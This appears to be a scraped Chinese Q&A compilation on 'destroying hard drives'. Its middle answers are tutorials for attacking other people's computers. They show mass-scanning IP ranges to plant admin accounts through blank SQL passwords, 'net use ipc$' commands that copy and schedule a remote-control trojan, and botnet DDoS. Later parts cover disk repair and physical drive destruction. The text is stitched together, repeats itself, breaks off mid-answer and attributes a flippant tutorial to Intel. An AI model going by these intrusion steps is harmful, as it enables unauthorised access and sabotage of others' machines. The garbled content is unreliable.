1.如何物理破坏移动硬盘的系统

简单的破坏电脑系统,怎样破坏电脑系统

鼠标右键单击我的电脑-属性-硬件-设备管理器,你可以找到DVD/CD-ROM驱动器,把里面的驱动全部停用,这样光驱就会失效了,需要的时候在启用。

这时在给机器设上密码,没问题了。他要是知道怎样启用,就把光驱线拔了!右击我的电脑----属性----硬件-----设备管理———右键DVD光驱------停用要在保密下进行。这样他的光盘就没办法用了。

可以试着装一些还原软件如冰点(类似网吧的关机后所有的全部恢复原样)他要玩游戏每次都要下载,当然如果他不嫌烦的话就没用了

或者进入BIOS,把里面的所有的选项魔改一通,十有八九可以把电脑搞坏。

如何物理破坏移动硬盘的系统

问题一:如何攻击别人的电脑 教你如何远程攻击别人的电脑(黑客教程)

1,傻瓜级入侵

之所以说这是傻瓜级,因为这个方法完全不用动脑子,并且保守的说,照这个方法,两个小时内肯定至少能入侵3台电脑!3台绝对是保守的数目!

需要软件:WinntAutoAttack (版本:V2.0) Remote Administrator v2.0(简称RA) 3389登陆器(xp自带的有,要是xp,就不要下载了,就是开始-所有程序-附件-通讯-远程桌面连接

不知道在哪下?用百度搜!我最不喜欢的就是当在群里我告诉别人用什么软件后,他还喋喋不休的问我在哪下?把地址给我吧,太懒了吧,难道下载地址在我脑子里?我不也是要搜吗?

好了,下边我们开始入侵了,下边就是过程:

第一步. 打开WinntAutoAttack,就是那个手雷的标志,在起始ip里和目标ip里填上一个ip段,并且尽量把范围搞大点,比如在起始ip里填218.88.1.1,在目标ip里填218.88.255.255.ip段建议下一个显ip的qq,参考你qq上好友的ip去填.中奖概率更大!勾上仅对ping检查成功的机器进行检测,检测3389端口和收集netbios信息

在IIS溢出选项卡里勾上开99端口shell,这个是用来开99端口telnet的,要是你不会用telnet,这个就不要勾了. 在简单管理员密码选项卡里勾上列出所有密码简单的管理帐号和上传并安装远程图形控制软件. 在sql漏洞选项卡里也一样,就是把三个框都打上勾,就是列出密码为空的sa帐号建立系统管理员帐号(shanlu)和上传并安装远程图形控制软件.

好了,连上网(你不会连网都没连吧?)根据你机器的性能,把线程调下,就是拖那个小滑块,越往右线程越大,要是你的机器性能不好,太大的线程会死机的!我的机器性能不错,我才用110左右的线程,并且有的时候我也会死机... ...(哭... ...)

ok!一切就绪!点开始 . 接下来,接下来我们干什么呢?在qq上聊天吧,等结果吧

第二步. 时间很快就过去了,过了半个小时了吧,我们看看有没有什么结果,点信息,把上边的废话框内容往下拉

主机:218.88.55.55

3389,Windows 2000 Advance Server Terminal 端口开放。

SQL漏洞:

sa帐号密码为空。

建立系统管理员帐号shanlu()成功

哈哈,有肉鸡了,这个是3389的肉鸡,我们用3389的登陆器登陆上去,填上他的ip,用户名是shanlu,密码是空,他的机器就展现在我们面前了!

要是有这样的提示:

主机:218.88.55.55

3389,Windows 2000 Advance Server Terminal 端口开放。

简......>>

问题二:知道对方的IP,如何攻击对方的电脑? 1.取得对方IP地址如XX.XX.XX.XX,方法太多不细讲了。2.判断对方上网的地点,开个DOS窗口键入 TRACERT XX.XX.XX.XX 第4和第5行反映的信息既是对方的上网地点。3.得到对方电脑的名称,开个DOS窗口键入 NBTSTAT -A XX.XX.XX.XX 第一行是对方电脑名称 第二行是对方电脑所在工作组 第三行是对方电脑的说明4.在Windows目录下有一文件供为LMHOSTS.SAM,将其改名为LMHOSTS,删除其内容,将对方的IP及电脑名按以下格式写入文件: XX.XX.XX.XX 电脑名5.开DOS窗口键入 NBTSTAT -R6.在开始-查找-电脑中输入对方电脑名,出现对方电脑点击即可进入。以上方法请不要乱用,本人对你用上面的方法所惹出的麻烦概不负责,请慎重。 对付上面进攻的最好办法就是隐藏你的IP地址。

问题三:怎么攻击别人的电脑 攻击别人电脑不是那么好弄的 而且不知道你的意思是攻击别人的电脑 还是要入侵别人的电脑?如果攻击别人的电脑 那么首先你是需要有大量的肉鸡 一台电脑相当于一台肉鸡 用远控来上线 之后查到对方的IP地址 看看是否能PING通 然后用大量肉鸡里的流量去攻击对方电脑 轻者可使对方电脑网速变慢、死机,重者完全可以损坏对方的电脑。不过要有大量肉鸡是很不容易的 需要有一个免杀的木马才可以。如果要是入侵对方的电脑 这个更麻烦 查到对方IP 然后还需要扫描对方电脑的弱口令 进行猜解等等 一般对方电脑如果开启1433、3389、135等这些高危端口 也是比较容易入侵的 不过我说的这两种是很麻烦的 还是建议你不要考虑这些了

问题四:怎么用CMD攻击个人电脑? 64132是端口号

搞小破坏方法不建议使用,如果想开个玩笑,去下载个扫描工具,针对IP看有什么漏洞,然后根据具体漏洞实施入侵(具体就不详细说了,免得带坏你呵呵)取得ADMIN帐户就可以为所欲为了

问题五:怎么攻击别人电脑 这又何苦这样

提起黑客,总是那么神秘莫测。在人们眼中,黑客是一群聪明绝顶,精力旺盛的年轻人,一门心思地破译各种密码,以便偷偷地、未经允许地打入 *** 、企业或他人的计算机系统,窥视他人的隐私。那么,什么是黑客呢?

黑客(hacker),源于英语动词hack,意为“劈,砍”,引申为“干了一件非常漂亮的工作”。在早期麻省理工学院的校园俚语中,“黑客”则有“恶作剧”之意,尤指手法巧妙、技术高明的恶作剧。在日本《新黑客词典》中,对黑客的定义是“喜欢探索软件程序奥秘,并从中增长了其个人才干的人。他们不象绝大多数电脑使用者那样,只规规矩矩地了解别人指定了解的狭小部分知识。”由这些定义中,我们还看不出太贬义的意味。他们通常具有硬件和软件的高级知识,并有能力通过创新的方法剖析系统。“黑客”能使更多的网络趋于完善和安全,他们以保护网络为目的,而以不正当侵入为手段找出网络漏洞。

另一种入侵者是那些利用网络漏洞破坏网络的人。他们往往做一些重复的工作(如用暴力法破解口令),他们也具备广泛的电脑知识,但与黑客不同的是他们以破坏为目的。这些群体成为“骇客”。当然还有一种人兼于黑客与入侵者之间。

一般认为,黑客起源于50年代麻省理工学院的实验室中,他们精力充沛,热衷于解决难题。60、70年代,“黑客”一词极富褒义,用于指代那些独立思考、奉公守法的计算机迷,他们智力超群,对电脑全身心投入,从事黑客活动意味着对计算机的最大潜力进行智力上的自由探索,为电脑技术的发展做出了巨大贡献。正是这些黑客,倡导了一场个人计算机革命,倡导了现行的计算机开放式体系结构,打破了以往计算机技术只掌握在少数人手里的局面,开了个人计算机的先河,提出了“计算机为人民所用”的观点,他们是电脑发展史上的英雄。现在黑客使用的侵入计算机系统的基本技巧,例如破解口令(password cracking),开天窗(trapdoor),走后门(backdoor),安放特洛伊木马(Trojan horse)等,都是在这一时期发明的。从事黑客活动的经历,成为后来许多计算机业巨子简历上不可或缺的一部分。例如,苹果公司创始人之一乔布斯就是一个典型的例子。

在60年代,计算机的使用还远未普及,还没有多少存储重要信息的数据库,也谈不上黑客对数据的非法拷贝等问题。到了80、90年代,计算机越来越重要,大型数据库也越来越多,同时,信息越来越集中在少数人的手里。这样一场新时期的“圈地运动”引起了黑客们的极大反感。黑客认为,信息应共享而不应被少数人所垄断,于是将注意力转移到涉及各种机密的信息数据库上。而这时,电脑化空间已私有化,成为个人拥有的财产,社会不能再对黑客行为放任不管,而必须采取行动,利用法律等手段来进行控制。黑客活动受到了空前的打击。

但是, *** 和公司的管理者现在越来越多地要求黑客传授给他们有关电脑安全的知识。许多公司和 *** 机构已经邀请黑客为他们检验系统的安全性,甚至还请他们设计新的保安规程。在两名黑客连续发现网景公司设计的信用卡购物程序的缺陷并向商界发出公告之后,网景修正了缺陷并宣布举办名为“网景缺陷大奖赛”的竞赛,那些发现和找到该公司产品中安全漏洞的黑客可获1000美元奖金。无疑黑客正在对电脑防护技术的发展作出贡献。

2,黑客攻击

一些黑客往往回采取一些几种方法,但是我很想说的是,一个优秀的黑客绝不会随便攻击别人的。

1)、获取口令

这又有三种方法:一是通过网络监听非法得到用户口令,这类方法有一定的局限性,但危害性极大,监听者往往能够获得其所在网段的所有用户......>>

问题六:如何在自己电脑上攻击他人电脑? 其实攻击别人的电脑不是最让人头痛的办法,要是共同的网线,就下载一个P2P终结者软件,控制他的流量,急死他! 下面是如何攻击别人电脑,给你一个网址,你自己可以去学一学,上面有很多方法的hi.baidu/...a (一):shed.exe

(二)流光2000

(三)cmd.exe (其实就是2000下的dos啦)!

(四)冰河8.4 操作系统:win2000 server 或者winxp系统。 “shed.exe”:其实就是用来网上查共享资源的,速度快,可以查到很多服务断的共项文件,不过在这里面有些ip在浏览器中无法访问,这是因为其中也包含了个人上网的ip.呵呵!一些作网站,网吧的服务器一些目录都是共享的,有些是可以访问,但是不能删除,因为你所访问的都是以匿名访问的,所以权限不够!有些需要密码。遇到密码怎办?用流光! “流光”虽说对202作了限制,但是对小日本的ip可是没有限制的,呵呵!所以说使用流光的ipc探测,建立一个空对话,查到用户列表,然后先简单探测,此时有些网管懒惰,把administrator设置的过于简单,呵呵,你就可以抓到了。

下一步如何做呢?也许在你查对方的端口时发现对方开的端口很少,比如ftp没开,怎办呢?冰河! “冰河”,想必许多朋友都玩过,使用冰河控制一台服务器速度很快,(因为服务器那边带宽很大)几分钟就可以查到对方主机的主页所在位置。但是如何上传并且控制他呢? “cmd.exe” 是2000下的dos了,执行cmd.exe 使用net命令,

具体操作如下:

第一步:net use \\ip\ipc$ “password” /user:”user” 说明:以一个超级用户名与你想黑的网站建立联接,当然超级用户必须是该网站admin里的。这里的”ip”就是主机了,“password”就是超级用户的密码,“user”就是超级用户。比如:net use \\210.248.250.2\ipc$ “maozhiie” /user:maozhijie

第二步:copy g-server.exe \\ip\admin$\system32 说明:g-server.exe就是冰河的远程服务器端。意义:将此文件拷贝到对方的主机winnt里的system32目录里。也许有人要问木马侵入对方那边可以察觉出来的吧,呵呵!装了防火墙估计可以,不过很多主机没钱买呀!不像中国盗版满天飞!如果你有最新的木马也可以的!这是最好的了!!嘿嘿……

第三步:net time \\ip 察看对方的服务器时间。由于有时差,应该是一个小时吧!所以必须要以对方的服务器时间为准。

第四步:at \\ip time g-server.exe 这里的time就是对方的主机时间。作用:在规定时间执行该程序。比如 at \\210.248.250.2 19:55 g-server.exe 第五步:冰河就可以控制该电脑了。这个我就不说了吧,呵呵!菜鸟也会......>>

问题七:怎样攻击别人的电脑、或者是系统。 知道对方的IP,然后用攻击软件进行攻击,具体的方法就不是一二天能学会的了,也不是一句话两句话能说清楚的,就这样一个单纯的攻击就可以写一本书。

问题八:知道对方电脑的IP地址,怎么对其进行攻击他的电脑 知道对方IP入侵别人的电脑

黑客已经成为一种文化,很多人想成为黑客,他们偶尔学到了几种小花招,总喜欢拿别人开玩笑,搞些恶作剧。其实黑客的最高境界在于防守,不在于进攻。所谓明枪易躲暗箭难防,要防住他人所有的进攻,肯定需要懂得比对方更多的系统知识,了解更多的系统漏洞,及如何弥补漏洞。现在满天都是黑客教程,但真正有用的不多,下面介绍一种WIN9X下的入侵方法: 1.取得对方IP地址如XX.XX.XX.XX,方法太多不细讲了。 2.判断对方上网的地点,开个DOS窗口键入 TRACERT XX.XX.XX.XX 第4和第5行反映的信息既是对方的上网地点。 3.得到对方电脑的名称,开个DOS窗口键入 NBTSTAT -A XX.XX.XX.XX 第一行是对方电脑名称 第二行是对方电脑所在工作组第三行是对方电脑的说明 4.在Windows目录下有一文件名为LMHOSTS.SAM,将其改名为LMHOSTS,删除其内容,将对方的IP及电脑名按以下格式写入文件: XX.XX.XX.XX 电脑名 5.开DOS窗口键入 NBTSTAT -R 6.在开始-查找-电脑中输入对方电脑名,出现对方电脑点击即可进入。以上方法请不要乱用,本人对你用上面的方法所惹出的麻烦概不负责,请慎重。 对付上面进攻的最好办法就是隐藏你的IP地址。注释掉的------>

黑客已经成为一种文化,很多人想成为黑客,他们偶尔学到了几种小花招,总喜欢拿别人开玩笑,搞些恶作剧。其实黑客的最高境界在于防守,不在于进攻。所谓明枪易躲暗箭难防,要防住他人所有的进攻,肯定需要懂得比对方更多的系统知识,了解更多的系统漏洞,及如何弥补漏洞。现在满天都是黑客教程,但真正有用的不多,下面介绍一种WIN9X下的入侵方法: 1.取得对方IP地址如XX.XX.XX.XX,方法太多不细讲了。 2.判断对方上网的地点,开个DOS窗口键入 TRACERT XX.XX.XX.XX 第4和第5行反映的信息既是对方的上网地点。 3.得到对方电脑的名称,开个DOS窗口键入 NBTSTAT -A XX.XX.XX.XX 第一行是对方电脑名称 第二行是对方电脑所在工作组第三行是对方电脑的说明 4.在Windows目录下有一文件名为LMHOSTS.SAM,将其改名为LMHOSTS,删除其内容,将对方的IP及电脑名按以下格式写入文件: XX.XX.XX.XX 电脑名 5.开DOS窗口键入 NBTSTAT -R 6.在开始-查找-电脑中输入对方电脑名,出现对方电脑点击即可进入。以上方法请不要乱用,本人对你用上面的方法所惹出的麻烦概不负责,请慎重。 对付上面进攻的最好办法就是隐藏你的IP地址

hackant/?u=11714

问题九:黑客是如何攻击别人的电脑的? 黑客常常利用电子邮件系统的漏洞,结合简单的工具就能达到攻击目的。一同走进黑客的全程攻击,了解电子邮件正在面临的威胁和挑战……毫无疑问,电子邮件是当今世界上使用最频繁的商务通信工具,据可靠统计显示,目前全球每天的电子邮件发送量已超过500亿条,预计到2008年该数字将增长一倍。电子邮件的持续升温使之成为那些企图进行破坏的人所日益关注的目标。如今,黑客和病毒撰写者不断开发新的和有创造性的方法,以期战胜安全系统中的改进措施。出自邮件系统的漏洞典型的互联网通信协议――TCP和UDP,其开放性常常引来黑客的攻击。而IP地址的脆弱性,也给黑客的伪造提供了可能,从而泄露远程服务器的资源信息。防火墙只控制基于网络的连接,通常不对通过标准电子邮件端口(25端口)的通信进行详细审查。一旦企业选择了某一邮件服务器,它基本上就会一直使用该品牌,因为主要的服务器平台之间不具互操作性。以下分别概述了黑客圈中一些广为人知的漏洞,并阐释了黑客利用这些安全漏洞的方式。一、IMAP 和 POP 漏洞密码脆弱是这些协议的常见弱点。各种IMAP和POP服务还容易受到如缓冲区溢出等类型的攻击。二、拒绝服务(DoS)攻击1.死亡之Ping――发送一个无效数据片段,该片段始于包结尾之前,但止于包结尾之后。2.同步攻击――极快地发送TCP SYN包(它会启动连接),使受攻击的机器耗尽系统资源,进而中断合法连接。3.循环――发送一个带有完全相同的源/目的地址/端口的伪造SYN包,使系统陷入一个试图完成TCP连接的无限循环中。三、系统配置漏洞企业系统配置中的漏洞可以分为以下几类:1.默认配置――大多数系统在交付给客户时都设置了易于使用的默认配置,被黑客盗用变得轻松。2.空的/默认根密码――许多机器都配置了空的或默认的根/管理员密码,并且其数量多得惊人。3.漏洞创建――几乎所有程序都可以配置为在不安全模式下运行,这会在系统上留下不必要的漏洞。面说说吧,希望你能从中领略一些道理.

问题十:电脑被攻击了,怎么办 安装杀毒软件和防火墙,拒绝攻击即可。

DoS是Denial of Service的简称,即拒绝服务,造成DoS的攻击行为被称为DoS攻击,其目的是使计算机或网络无法提供正常的服务。最常见的DoS攻击有计算机网络带宽攻击和连骇性攻击。带宽攻击指以极大的通信量冲击网络,使得所有可用网络资源都被消耗殆尽,最后导致合法的用户请求就无法通过。连通性攻击指用大量的连接请求冲击计算机,使得所有可用的操作系统资源都被消耗殆尽,最终计算机无法再处理合法用户的请求。

移动硬盘出现物理坏道,怎么把坏道里的数据拷贝出来?

一、修理移动硬盘坏道

对于逻辑坏道,我们可以修复,对于物理坏道,我们应采用隔离的办法,以最大程度减少损失,防止坏道进一步扩散为目标。我见过有些人在报纸上吹说用某个特殊软件能修理物理坏道,最要命的是许多人对低格移动硬盘的迷信,实在是误人之语。所谓低级格式化,指的是将空白的磁盘划分出柱面和磁道,然后再将磁道划分为若干个扇区,每个扇区又划分出标识部分ID、间隔区GAP和数据区DATA等。低级格式化只能在DOS环境下完成,而且只能针对—块移动硬盘而不能支持单独的某一个分区。有些坏磁道和坏扇区能够通过低级格式化来修复,但对于真正的移动硬盘磁盘表面物理划伤则无法进行修复,这只有通过各种办法标出坏扇区的位置,以便让操作系统不去使用,以防止扩大坏道进而延长移动硬盘使用。特别想强调,低级格式化是一种损耗性操作,对移动硬盘的寿命有一定的负面影响,所以,如无必要,用户们尽量不要低级格式化移动硬盘。

对于逻辑坏道,一般情况下我们用操作系统自带的工具和一些专门的移动硬盘检查工具就能发现并修复。如:Windows自带的Scandisk磁盘扫描程序就是发现移动硬盘逻辑坏道最常用的工具,而我们常见的Format命令不能对任何移动硬盘坏道起到修补作用,这点大家要明白。我们可在Windows系统环境下,在“我的电脑”中选中要处理的移动硬盘盘符,选择其“属性”,在出现的“工具”按钮中选择“查错状态”,再在“扫描类型”中选“全面检查”,并将“自动修复错误”打上“勾”,然后“开始”即可。如果系统在启动时不进行磁盘扫描或已不能进入Windows系统,我们也可用软盘或光盘启动盘启动电脑后,在相应的盘符下,如“A:”下运行Scandisk*:(注:*为要扫描的移动硬盘盘符),回车后来对相应需要扫描修复的移动硬盘分区进行修理。

但是,如果是移动硬盘物理坏道,那么千万千万记住不要试图用这些方法来修复,相反用各种工具反复扫描,就是对移动硬盘的物理坏区强制进行多次读写,必然会使坏道变多,进而扩散,正确的方法是用下面的方法果断地把已有坏道的地方隔离开。这是一种很无奈的办法,但是一个20G的移动硬盘,如果因为坏道,屏蔽了15G,总还有5G空间可用,如果不这样做,最后的结果是整个移动硬盘全部报废。

方法一:用PartitionMagic等磁盘软件完成工作

如PartitionMagic分区软件,先用PartitionMagic4中的“check”命令或Windows中的磁盘扫描程序来扫描磁盘,算出坏簇在移动硬盘上的位置,然后在Operation菜单下选择“Advanced/badSectorRetest”,把坏簇所在移动硬盘分成多个区后,再把坏簇所在的分区隐藏,以免在Windows中误操作,这个功能是通过HidePartition菜单项来实现的。这样也能保证有严重坏道的移动硬盘的正常使用,并免除系统频繁地去读写坏道从而扩展坏道的面积。但是这需要对这些软件熟悉,并且有计算移动硬盘的经验,许多人并不容易做到准确。

方法二:用FDISK和格式化命令FORMAT。

具体的方法是这样的,第一要搞清移动硬盘的容量,对于有问题的磁盘先用FDISK分成一个C盘,再用FORMAT进行格式化,当碰到无法修复的坏块时面对FORMAT总是试图修复,这时记录下进行的百分比.然后按CTRL+BREAK强行终止任务,用磁盘总容量×百分比,得出这部分正常的磁盘容量,用FIDSK划出一个逻辑磁盘,再将后面的磁盘估计出坏道的大概大小,大概比例为10%左右,再划分一个逻辑盘。这个小盘不用格式化,在总工作完成后将其删除,这样就将坏块给全部跳过去了。这样可能会损失一些好道,但对大容量移动硬盘来说无足轻重,而移动硬盘使用起来更加稳定。

二、移动硬盘彻底损坏后的数据抢救

伴随着科技的发展,250G、500G的移动硬盘在普通用户中都已经屡见不鲜了。但是,在长时间的使用移动硬盘过程中,我们也在承受着移动硬盘随时也会出错的风险,轻则移动硬盘的数据丢失,重则整个移动硬盘报废,造成不可预料的严重后果。采用什么办法,才能解决常见的移动硬盘数据丢失故障,成为用户十分关注的问题。

一、移动硬盘的分区

对于你手中移动硬盘来说,首先要做的事情就是分区了。移动硬盘分区是否合理直接影响到以后工作的便利性和数据的安全性。我们最常见到的分区表错误也是移动硬盘的最严重错误,不同错误的程度会造成不同的损失。如果是没有活动分区标志,则计算机无法启动。但从软驱或光驱引导系统后可对移动硬盘读写,可通过fdisk重置活动分区可进行修复。如果是某一分区类型错误,会造成某一分区的丢失。

在一般情况下完成移动硬盘分区之后,会形成3种形式的分区状态;即主分区、扩展分区和非DOS分区。在移动硬盘中非DOS分区(Non-DOSPartition)是一种特殊的分区形式,它是将移动硬盘中的一块区域单独划分出来供另一个操作系统使用,对主分区的操作系统来讲,是一块被划分出去的存储空间。只有非DOS分区内的操作系统才能管理和使用这块存储区域,非DOS分区之外的系统一般不能对该分区内的数据进行访问。

主分区则是一个比较单纯的分区,通常位于移动硬盘的最前面一块区域中,构成逻辑C磁盘。其中的主引导程序是它的一部分,此段程序主要用于检测移动硬盘分区的正确性,并确定活动分区,负责把引导权移交给活动分区的DOS或其他操作系统。此段程序损坏将无法从移动硬盘引导,但从软区或光区之后可对移动硬盘进行读写。

而扩展分区的概念是比较复杂的,极容易造成移动硬盘分区与逻辑磁盘混淆;分区表的第四个字节为分区类型值,正常的可引导的大于32mb的基本DOS分区值为06,扩展的DOS分区值是05。如果把基本DOS分区类型改为05则无法启动系统,并且不能读写其中的数据。如果把06改为DOS不识别的类型如efh,则DOS认为改分区不是DOS分区,当然无法读写。很多人利用此类型值实现单个分区的加密技术,恢复原来的正确类型值即可使该分区恢复正常。分区表中还有其他数据用于纪录分区的起始或终止地址。这些数据的损坏将造成该分区的混乱或丢失,一般无法进行手工恢复,唯一的方法是用备份的分区表数据重新写回,或者从其他的相同类型的并且分区状况相同的移动硬盘上获取分区表数据,否则将导致其他的数据永久的丢失。由于微机操作系统仅仅为分区表保留了64个字节的存储空间,而每个分区的参数占据16个字节,所以操作系统只允许存储4个分区的数据,实际使用中4个逻辑磁盘往往不能满足需求;我们常说的移动硬盘扩展分区,它只是一个指向下一个分区的指针,这种指针结构将形成一个单向链表。所以一旦单向链表发生问题,将会导致逻辑磁盘的丢失。

二、移动硬盘的数据恢复

1、误格式化移动硬盘数据的恢复

在DOS高版本状态下,格式化操作format在缺省状态下都建立了用于恢复格式化的磁盘信息,实际上是把磁盘的DOS引导扇区,fat分区表及目录表的所有内容复制到了磁盘的最后几个扇区中(因为后面的扇区很少使用),而数据区中的内容根本没有改变。我们都知道在DOS时代有一个非常不错的工具UnFormat,它可以恢复由Format命令清除的磁盘。如果用户是在DOS下使用Format命令误格式化了某个分区的话,可以使用该命令试试。不过UnFormat只能恢复本地移动硬盘和软件驱动器,而不能恢复网络驱动器。UnFormat命令除了上面的反格式化功能,它还能重新修复和建立移动硬盘驱动器上的损坏分区表。

但目前UnFormat已经显得有点“力不从心”了,再使用它来恢复格式化后分区的方法已经有点过时了,我们可以使用多种恢复软件来进行数据恢复,比如使用Easyrecovery6.0和Finaldata2.0等恢复软件均可以方便的进行数据恢复工作。另外DOS还提供了一个miror命令用于纪录当前的磁盘的信息,供格式化或删除之后的恢复使用,此方法也比较有效。

2、零磁道损坏时的数据恢复

移动硬盘的主引导记录区(MBR)在零磁道上。MBR位于移动硬盘的0磁道0柱面1扇区,其中存放着移动硬盘主引导程序和移动硬盘分区表。在总共512字节的移动硬盘主引导记录扇区中,446字节属于移动硬盘主引导程序,64字节属于移动硬盘分区表(DPT),两个字节(55AA)属于分区结束标志。零磁道一旦受损,将使移动硬盘的主引导程序和分区表信息将遭到严重破坏,从而导致移动硬盘无法引导。0磁道损坏判断:系统自检能通过,但启动时,分区丢失或者C盘目录丢失,移动硬盘出现有规律的“咯吱__咯吱”的寻道声,运行SCANDISK扫描C盘,在第一簇出现一个红色的“B”,或者Fdisk找不到移动硬盘、DM死在0磁道上,此种情况即为零磁道损坏!

零磁道损坏属于移动硬盘坏道之一,只不过它的位置相当重要,因而一旦遭到破坏,就会产生严重的后果。如果0磁道损坏,按照目前的普通方法是无法使数据完整恢复的,通常0磁道损坏的移动硬盘,可以通过PCTOOLS的DE磁盘编辑器(或者DiskMan)来使0磁道偏转一个扇区,使用1磁道来作为0磁道来进行使用。而数据可以通过Easyrecovery来按照簇进行恢复,但数据无法保证得到完全恢复。

销毁硬盘最快的方法是什么?

处理就电脑的时候什么配件让你最头疼?对我来说应该就是硬盘了。因为老的硬盘不仅容量比较低,而且使用时间长了的话还会有许多的坏道,但是直接扔掉的话有可能会泄露个人信息(比如说珍藏多年的学习资料)。当然比较新并且坏道不多的话可以自己买一个硬盘盒当作移动硬盘使用,那么那些基本无法正常使用的硬盘应该怎样处理呢英特尔官方微博今天就针对这个事情出了一个教程,提供了三种销毁硬盘的好方法。

方法一:泡水,注意尽量用脏水。如果拆过机械硬盘的话应该知道硬盘的碟片时需要保证清洁的,所以把硬盘丢到脏水里面之后,水可以破坏硬盘的许多结构,而里面的脏东西可以让这个过程效果更好,所以直接把硬盘丢到拖地之后的水桶里面应该是一个不错的选择。

方法二:拆开后用火烧,注意不要整个烧,拆散了均匀火烤。简单来说就是生一把火,把硬盘拆开后把碟片扔进去。虽然可能会闻到硬盘的香气,但是考虑到安全问题,这里不推荐使用需要加热食品的设备来做。

方法三:拆开后用刀片在此片上划出一道半径,多划几道比较保险。用刀子划不仅可以破坏硬盘上的数据,如果比较严重的话还会影响磁头的工作,另外这里还是不建议用切菜的刀来划。

以上就是英特尔提供的三个处理旧硬盘的方法,你学会了么?

怎样把硬盘弄坏

弄坏硬盘很简单:

1、采用全盘格式化(慢速)的时候拔掉电脑电源插头。

2、把供电线路(共4根),其中的两条火线互换。

3、高速读取硬盘的时候用木锤敲打硬盘中间(劲头大点)。

4、将硬盘电路板拆掉,然后用刀片将背面的线路板划断几条线。

5、将硬盘外壳拆掉,洒点水和灰进去。

扩展资料:

硬盘的作用:

硬盘是计算机中最重要的存储器之一,由一个或多个铝制或玻璃制的碟片组成。计算机需要正常运行所需的大部分软件都存储在硬盘上,因硬盘存储的容量较大,硬盘是电脑上使用坚硬的旋转盘片为基础的存储设备。

它在平整的磁性表面存储和检索数字数据,硬盘相当于计算机的仓库,操作系统,安装的软件,还有文档,资料等等,都是以数据的形式存储在仓库中,软件的运行也是把数据先调入内存,CPU是和内存进行数据交互,最后的结果才放入硬盘。

如何把移动硬盘弄坏

看你想损坏到什么程度,想彻底的物理损坏,那就直接扔水泥地上摔一下就可以了.想损坏程序,可以装点病毒.或者通电的时候,读写文件的时候直接拔掉数据线,然后再试试插上电脑还能不能读出来,基本上二到三次怎么也坏了.要实在搞不动,可以把硬盘交给我,愿意效劳.

硬盘损坏应该是指一个硬盘不能做为一个存储器件了。可是硬盘的损坏从表面上看是无法存储文件和读取文件或程序,一般就认为这个硬盘出现了故障,而硬盘的故障又可以分为物理损坏和逻辑损坏。物理损坏是指硬盘的本身零部件遭到损毁,必须得进行更换的损坏。例如盘片、磁头、电机、芯片等。

而逻辑损坏一般指硬盘的分区表丢失,存储磁介质磁化、硬化等,这些故障一般可以用专用的软件进行修复,通过多方面的修复手段而不能恢复的硬盘,就认为是物理损坏了。做为一般的计算机使用人员,多数是不可能进行硬盘物理损坏修复的,但多数可以在DOS下用一些专用的软件对逻辑损坏的硬盘进行恢复。对于硬盘来说,其中最宝贵的不是硬盘本身,而是硬盘中长时间积累下来的数据,而这些数据的价值有的是不可以用金钱来衡量的。现在有一些专业部门可以对硬盘进行修复或数据抢救。

如何彻底破坏移动硬盘

砸了,磁盘砸碎;

硫酸,毁尸灭迹;

马桶,永远不见。